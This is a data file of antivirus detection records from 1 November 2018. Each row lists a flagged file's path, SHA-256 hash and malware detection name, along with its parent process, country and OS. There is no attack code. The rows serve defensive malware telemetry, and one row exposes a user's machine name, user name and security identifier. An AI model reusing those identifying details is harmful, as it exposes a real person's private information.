  Row(detection=Row(filename='2c4b25e02357914cabf6732f1e9844378cdd0ace882ca4226a5758acb9a0a7e8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\2C4B25E02357914CABF6732F1E9844378CDD0ACE882CA4226A5758ACB9A0A7E8', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='2c4b25e02357914cabf6732f1e9844378cdd0ace882ca4226a5758acb9a0a7e8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:49:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:34:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155520-bb1433c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155520-BB1433C2', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh4fb1', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH4FB1', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:31:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='syncversion.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\{406976D2-653B-1BA4-0E0D-3C76D2DFC148}\\SyncVersion.exe', filesize=320000, name='ADWARE/DealPly.Gen2.#M300.#R101520'), hash='32c3ffac25787bfef32d695bfeba13d9f8265b4c5bc7b653fe767c076ef02822', metadata=Row(cmdline='{03165287-559A-4375-9296-C94561D91A38} S-1-5-21-25666152-1838492169-3340794220-1000:Lena-TOSH\\\\\\\\Lena:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-01T11:04:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhb3da.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHB3DA.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:37:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-20-16-02.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T18:21:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2014.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\GAJI\\2014\\2014.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5586395\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T11:20:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keyhook64.dll', filepath='C:\\Windows\\KeyHook64.dll', filesize=3484000, name='TR/Bandios.ulkkx.#M1.#R1'), hash='16159b5fe91e89cc5ef9bbac6ef6ff8a1d4f4b7ce00b1b0195e5f7fda9329853', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T17:08:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170707-905af93c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-170558-84D52381\\AVSCAN-20181101-170707-905AF93C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:07:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scmini.exe', filepath='\\\\?\\C:\\Program Files\\SmartCloudInput\\1.3.6.10910\\SCMiNi.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='4f5d72478c0ea865608bea5bc11b1c4fcacf7272a9921e2aa26027d362cd030c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:42:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='live band.exe', filepath='\\\\?\\D:\\LIVE BAND.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:26:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T12:15:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154700-66e97715', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154700-66E97715', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134324-19da8e1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b61edb73\\AVSCAN-20181101-134248-14DAC64B\\AVSCAN-20181101-134324-19DA8E1D', filesize=696000, name='ADWARE/Amonetize.Gen.#M1.#R1'), hash='df264ecdbc5c8b21c86dc394ca14fc894c929b64a3bf1044ab777262d605189d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:43:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nscA92F.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:55:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\BetwaypokerMPP\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\BetwaypokerMPP\\mppoker.exe', parentsize=1214712, timestamp='2018-11-01T17:40:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b6bc2e7badad7999be98010944862399c03a6bba27f69a3e394bf53562e649c1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B6BC2E7BADAD7999BE98010944862399C03A6BBA27F69A3E394BF53562E649C1', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='b6bc2e7badad7999be98010944862399c03a6bba27f69a3e394bf53562e649c1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012039-1780034d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012039-1780034D', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nssF70B.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/monitor', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T02:34:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111823-32b1feb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111823-32B1FEB6', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:18:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092910-64c7980a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06701062\\AVSCAN-20181101-092644-558CD772\\AVSCAN-20181101-092910-64C7980A', filesize=192000, name='TR/Crypt.ZPACK.ppgdw.#M1.#R1'), hash='cd6d6e31b9479b31b84242c01aa1562f03a4645e40cfa8284eef8991e8002320', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\F:\\Marley Brinx\\zec\\Zec.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:26:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\CastSrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:57:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:38:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143107-063005ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-143107-063005EF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:31:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbeetle bug 3.exe', filepath='\\?\\J:\\العاب\\Beetle.Bug.3\\gBeetle Bug 3.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='d899f23d955e57e2bef0e7c8816f119ff647473cff8ce6837ccb77d5c4a20b34', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='HEUR/AGEN.1004654.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:01:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183206-488da0be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183206-488DA0BE', filesize=64000, name='VBA/Dldr.Agent.lvmvi.#M1.#R1'), hash='998e65594b9d27fccc5c02c2346d317f870b8424f2836edf14ad0efd1d19e70a', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:32:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123804-c5739c21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123739-B01DD1C4\\AVSCAN-20181101-123804-C5739C21', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:38:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105215-2fe43325', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_597256d4\\AVSCAN-20181101-104821-1B7B9DD1\\AVSCAN-20181101-105215-2FE43325', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:52:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d70bf18515370c41bdfcfa24b1fd553557f713b45b4233051fbfebf3fb2964a2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D70BF18515370C41BDFCFA24B1FD553557F713B45B4233051FBFEBF3FB2964A2', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='d70bf18515370c41bdfcfa24b1fd553557f713b45b4233051fbfebf3fb2964a2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:02:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112834-fb37a514', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bee60138\\AVSCAN-20181101-102815-AAFA40C5\\AVSCAN-20181101-112834-FB37A514', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:28:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142047-aafa94f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142047-AAFA94F4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:27:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201625-bab74bc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3856b854\\AVSCAN-20181101-201603-B6646B1B\\AVSCAN-20181101-201625-BAB74BC6', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:16:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000520-35e6c6d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_90cb24d3\\AVSCAN-20181102-000453-32E85503\\AVSCAN-20181102-000520-35E6C6D2', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:05:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112250-4151f728', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee41dbd6\\AVSCAN-20181101-111110-CB6F4E45\\AVSCAN-20181101-112250-4151F728', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='4682a5c1a07cdefd5b0db7496c9f21f8257c3be3ae87136287b1387d2f69e6ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:22:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003157-76153f00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003157-76153F00', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163907-73527235', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a955cb2e\\AVSCAN-20181101-153244-A478C5C4\\AVSCAN-20181101-163907-73527235', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T21:39:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190402-e5cdfceb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190402-E5CDFCEB', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002707-56a46575', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002707-56A46575', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:27:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='129c87278ccf88c8d473234adad580110c32c77ace9bd7cd989d3aeae006bfb9', metadata=Row(cmdline=None, country='GA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T02:28:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:22:51Z'), dt=datetime.date(2018, 11, 1)),
